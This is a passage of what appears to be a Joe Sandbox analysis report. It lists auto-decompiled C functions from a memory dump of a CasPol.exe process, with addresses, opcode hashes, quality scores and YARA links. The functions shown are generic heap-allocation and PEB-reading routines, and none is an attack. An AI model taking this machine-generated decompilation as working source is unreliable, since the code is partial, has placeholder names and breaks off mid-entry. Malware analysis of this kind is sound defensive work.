						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x14e8724 & 0x00000004;
							if(( *0x14e8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x14e8724; // 0x0
					_push( !_t7 >> 0x00000002 & 0x00000001);
					return L014A8DF1(__ebx, 0xc0000374, 0x14e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                  0x014b2076
                                                                  0x014b2078
                                                                  0x014b207d
                                                                  0x014b2083
                                                                  0x014b20a4
                                                                  0x014b20aa
                                                                  0x014b20ac
                                                                  0x014b20b7
                                                                  0x014b20ba
                                                                  0x014b20bc
                                                                  0x014b20c9
                                                                  0x014b20c9
                                                                  0x014b20d0
                                                                  0x014b20d2
                                                                  0x00000000
                                                                  0x014b20d2
                                                                  0x014b20be
                                                                  0x014b20c3
                                                                  0x014b20c5
                                                                  0x014b20c7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014b20c7
                                                                  0x014b20bc
                                                                  0x014b20d4
                                                                  0x014b2085
                                                                  0x014b2085
                                                                  0x014b209c
                                                                  0x014b20a3
                                                                  0x014b20a3

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c34adddbc163147a2e215a440e6e3e44a25f30ca1f9a128e7838b9f38fc27646
                                                                  • Instruction ID: 5508c68a43471035a2624e2b3f29a72e6e3cf4b350aa2f06a9657fbff9672754
                                                                  • Opcode Fuzzy Hash: c34adddbc163147a2e215a440e6e3e44a25f30ca1f9a128e7838b9f38fc27646
                                                                  • Instruction Fuzzy Hash: 10F020AA4121878ADF33AB293580AE23BD2D765150F0A008BDA901B33AC5B49893DB71
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0143927A Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E0143927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0143FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E014392C6(_t11, _t14);
				}
				return _t11;
			}





                                                                  0x01439295
                                                                  0x01439299
                                                                  0x0143929f
                                                                  0x014392aa
                                                                  0x014392ad
                                                                  0x014392ae
                                                                  0x014392af
                                                                  0x014392b0
                                                                  0x014392b4
                                                                  0x014392bb
                                                                  0x014392bb
                                                                  0x014392c5

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                  • Instruction ID: b2c7c1c99759b8347733137664c2b5487a4d048f59579f67cf0cbdafbc32cc18
                                                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                  • Instruction Fuzzy Hash: B1E02B323409016BE711AF0ACC80F03375DDFE6724F04447EB5041E262C6F5DC0987A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014C8B58 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 62%
                                                                  			E014C8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x14ed360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01417D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L0143B640(E01439AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                                  0x014c8b67
                                                                  0x014c8b6f
                                                                  0x014c8b72
                                                                  0x014c8b7d
                                                                  0x014c8b8f
                                                                  0x014c8b7f
                                                                  0x014c8b88
                                                                  0x014c8b88
                                                                  0x014c8b9a
                                                                  0x014c8b9b
                                                                  0x014c8b9d
                                                                  0x014c8bb5

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e7a10fe9672f6ceb0b45bd08b7d9e5a389112b2ea28fd76b3492c7db6846c3e4
                                                                  • Instruction ID: fe018b2d3fbe537b67d50580a184b6e6f221ac934e5517d83e06ffa414722a74
                                                                  • Opcode Fuzzy Hash: e7a10fe9672f6ceb0b45bd08b7d9e5a389112b2ea28fd76b3492c7db6846c3e4
                                                                  • Instruction Fuzzy Hash: 5DF0E2B0A0024EABDB00EBA9D906E6FB3B4EF18700F00045EBA05DB3A1FA30D900C794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FF358 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E013FF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0142F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01414620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                  0x013ff35d
                                                                  0x013ff361
                                                                  0x013ff367
                                                                  0x013ff372
                                                                  0x013ff38c
                                                                  0x013ff38c
                                                                  0x013ff394

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                  • Instruction ID: 093272563e4e1453723bf2255dd439cc3e86ad68755dfb8dc51526446c70fc04
                                                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                  • Instruction Fuzzy Hash: 61E0D833A40118FBDB2196D99E05F5ABFBDDB54A60F04015AFE04D7160D5749D40C2D0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014841E8 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E014841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x14d08f0);
				_t5 = E0144D08C(__ebx, __edi, __esi);
				if( *0x14e87ec == 0) {
					L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x14e87ec == 0) {
						 *0x14e87f0 = 0x14e87ec;
						 *0x14e87ec = 0x14e87ec;
						 *0x14e87e8 = 0x14e87e4;
						 *0x14e87e4 = 0x14e87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01484248();
				}
				return E0144D0D1(_t5);
			}





                                                                  0x014841e8
                                                                  0x014841ea
                                                                  0x014841ef
                                                                  0x014841fb
                                                                  0x01484206
                                                                  0x0148420b
                                                                  0x01484216
                                                                  0x0148421d
                                                                  0x01484222
                                                                  0x0148422c
                                                                  0x01484231
                                                                  0x01484231
                                                                  0x01484236
                                                                  0x0148423d
                                                                  0x0148423d
                                                                  0x01484247

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62516d0300ae7e8a9cac9db05ed3e147c549c9c20c0e21c0a5a280435d719578
                                                                  • Instruction ID: 0f87cb4fbb69ab9287e83e80bc15d7fd3f49690604ab60b446996356e9596b01
                                                                  • Opcode Fuzzy Hash: 62516d0300ae7e8a9cac9db05ed3e147c549c9c20c0e21c0a5a280435d719578
                                                                  • Instruction Fuzzy Hash: 5EF01EB88A0703CFDFB1EFAA9A04708B6E4F764361F10412FA0008B2BAC73454A4CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014AD380 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E014AD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L013FE8B0(__ecx, _a4, 0xfff);
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                  0x014ad38a
                                                                  0x014ad39b
                                                                  0x014ad3b1
                                                                  0x00000000
                                                                  0x014ad3b6
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                  • Instruction ID: 3085ef76796158bdf95f79f6fe60de39b1b9325c0aff11d1ab3c66dbb74bf4f1
                                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                  • Instruction Fuzzy Hash: DBE0C231280205BBDB226E88CC00FA97B16DF70BA1F114036FE085ABB0C671AC91D7C4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142A185 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0142A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x14e67e4 >= 0xa) {
					if(_t5 < 0x14e6800 || _t5 >= 0x14e6900) {
						return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01410010(0x14e67e0, _t5);
				}
			}





                                                                  0x0142a190
                                                                  0x0142a1a6
                                                                  0x0142a1c2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0142a192
                                                                  0x0142a192
                                                                  0x0142a19f
                                                                  0x0142a19f

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c22ec41e066a74c6a6ce715775dcca35d1d218bc10a072054a2b8babbfac8a44
                                                                  • Instruction ID: aa98885f5bf435cc20dd7509ba8c9357de9b994b680719216d7a52827afc1947
                                                                  • Opcode Fuzzy Hash: c22ec41e066a74c6a6ce715775dcca35d1d218bc10a072054a2b8babbfac8a44
                                                                  • Instruction Fuzzy Hash: D8D02EB12A10001AC72EA7009A18B313693F7B4772F3A080FF2030BDB9EB70C8D4C208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014753CA Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E014753CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0140EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                  0x014753ca
                                                                  0x014753ce
                                                                  0x014753d9
                                                                  0x014753de
                                                                  0x014753e1
                                                                  0x014753e1
                                                                  0x014753e6
                                                                  0x014753f3
                                                                  0x00000000
                                                                  0x014753f8
                                                                  0x014753fb

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                  • Instruction ID: bb122f6d946850a4eff5d0f6b2c6adefe4b119a4b63a47a2824d9b557044760a
                                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                  • Instruction Fuzzy Hash: 0DE08C319006809BDF13EB5AC650F8EBBF5FB54B00F140419A0086F770C634AC00CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0140AAB0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0140AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                  0x0140aab6
                                                                  0x0140aabb
                                                                  0x0145a442
                                                                  0x00000000
                                                                  0x0145a448
                                                                  0x0145a454
                                                                  0x0145a454
                                                                  0x0140aac1
                                                                  0x0140aac1
                                                                  0x0140aac6
                                                                  0x0140aac6

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                  • Instruction ID: d6e3deefbfcf1d1fd3ca187a841b2d078499a9af954869a7017e1ece1e626f19
                                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                  • Instruction Fuzzy Hash: 73D0E935352A80CFD757CB5DC554B1677A4BB45B44FD505A1E901CB762E63CD984CA00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FDB40 Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E013FDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01414620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                  0x013fdb4d
                                                                  0x013fdb54
                                                                  0x013fdb5f
                                                                  0x013fdb56
                                                                  0x013fdb56
                                                                  0x013fdb5c
                                                                  0x013fdb5c

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                  • Instruction ID: 3a476ed074a28817f7082e3f3fd628f63815f516f05f4512bcf6771d95e84c0a
                                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                  • Instruction Fuzzy Hash: 11C08C70280A01AAEB221F20CD01F003BA1BB20B09F4804A46300DA4F4DB7CDC01E600
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FAD30 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E013FAD30(intOrPtr _a4) {

				return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                  0x013fad49

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                  • Instruction ID: 9dd91d946648cef40a1223da53a0d2f61a4c73f41073875a3491b297fa5a93a9
                                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                  • Instruction Fuzzy Hash: BFC08C32080248BBC7126A46CD00F017B29E7A0B60F000021B6140A6718932E860D588
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01413A1C Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E01413A1C(intOrPtr _a4) {
				void* _t5;

				return L01414620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                  0x01413a35

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                  • Instruction ID: 738cf1ae08b0a19d4201d2097af3afb2658030d128e36ba7dbe12934f4d30c69
                                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                  • Instruction Fuzzy Hash: 7FC08C32080248BBC7126E42DC00F017B2AE7A0B60F040021B6080A9708636EC60D588
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01417D50 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E01417D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                  0x01417d56
                                                                  0x01417d5b
                                                                  0x01417d60
                                                                  0x01417d5d
                                                                  0x01417d5d
                                                                  0x01417d5d

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                  • Instruction ID: 2c668f102ad69573629a0bea211ddfeca18ae17bdeae3111a47976ab5b6580f8
                                                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                  • Instruction Fuzzy Hash: CEB092353019408FCE16DF18C080B1633F4BB48A40B8440D0E400CBA21D229E8008900
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01422ACB Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E01422ACB() {
				void* _t5;

				return E0140EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                  0x01422adc

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                  • Instruction ID: 26b993ccf5c6e738ab2a706fe7908238ac080ef6da5c344bdaaf4679ed4b6229
                                                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                  • Instruction Fuzzy Hash: E4B092328108418BCF02EB41C610A197331AB10650F0548A5900127970C238AC11CA40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439950 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1014efd5018cd7cd42aaeb393b7239116012eaf26af711b7d9ce899e11517190
                                                                  • Instruction ID: 13d81e3ecb7b2dc48d176ee537eb87fbc509279700f7181c1494850580c08e51
                                                                  • Opcode Fuzzy Hash: 1014efd5018cd7cd42aaeb393b7239116012eaf26af711b7d9ce899e11517190
                                                                  • Instruction Fuzzy Hash: 419002A170140403F140659948046070005A7E0342F51C012A2054596ECB798C517179
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439560 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b184f804ca06b7b44eb278976bc162db0c673f65294104d303008e3d18000d5
                                                                  • Instruction ID: ac4236f3fc8db892f554fb49f22055b442e514183dfb815bbf532d9e4e5f648f
                                                                  • Opcode Fuzzy Hash: 9b184f804ca06b7b44eb278976bc162db0c673f65294104d303008e3d18000d5
                                                                  • Instruction Fuzzy Hash: 30900265721000032145A599060450B0445B7E6391391C016F14065D1CC77188656365
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439B00 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 328892a146cc68626bef2a42df0c9f67faa295514135c889b8d498df9c314c9b
                                                                  • Instruction ID: 2c8665955819a421cde867a750c0089bc481f4b3d21a4ae93ef75987089fd4ea
                                                                  • Opcode Fuzzy Hash: 328892a146cc68626bef2a42df0c9f67faa295514135c889b8d498df9c314c9b
                                                                  • Instruction Fuzzy Hash: 4290026174100803F140719984147070006E7E0641F51C012A0014595DC766896576F5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014399D0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f897c87e223663a0c4f6faf1e3e147530df9692e5d01af021d905334b74a611d
                                                                  • Instruction ID: 5871254e2a8538864c8678d28098cc5670c21a65118eb9a7f49bafd30901b423
                                                                  • Opcode Fuzzy Hash: f897c87e223663a0c4f6faf1e3e147530df9692e5d01af021d905334b74a611d
                                                                  • Instruction Fuzzy Hash: 589002A171100043F104619944047060045A7F1241F51C013A2144595CC6798C616169
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0143A3B0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a8fe6bb4516d1f6016fecbc7e948594be55d801b840190515c0ddc9b6defc318
                                                                  • Instruction ID: 5d363a40b5c073b70db9ce6172ba9cd5f3484f06e7c56979b2e128ebd8e5e7db
                                                                  • Opcode Fuzzy Hash: a8fe6bb4516d1f6016fecbc7e948594be55d801b840190515c0ddc9b6defc318
                                                                  • Instruction Fuzzy Hash: D290027170144003F1407199844460B5005B7F0341F51C412E0415595CC7658856A265
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0143B040 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cc437fe295e8e707f2d3455455b4a82fab4dd802a39652e13014fb08799593b
                                                                  • Instruction ID: 0f0b765a3134cbbd1dba4fc7de213a1c3f4ad3e07bc2e92dc4bcb4334ba25177
                                                                  • Opcode Fuzzy Hash: 0cc437fe295e8e707f2d3455455b4a82fab4dd802a39652e13014fb08799593b
                                                                  • Instruction Fuzzy Hash: 359002A1B01140436540B19948044065015B7F1341391C122A04445A1CC7B88855A2A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439A10 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5209865632caa4924a4e856eec222a46d13370c875d3e5f2a1d178611bc8339
                                                                  • Instruction ID: 3d8ffe96fe7bb245656f86387aaae8f0b5415b75671e74e7c6405052a1464881
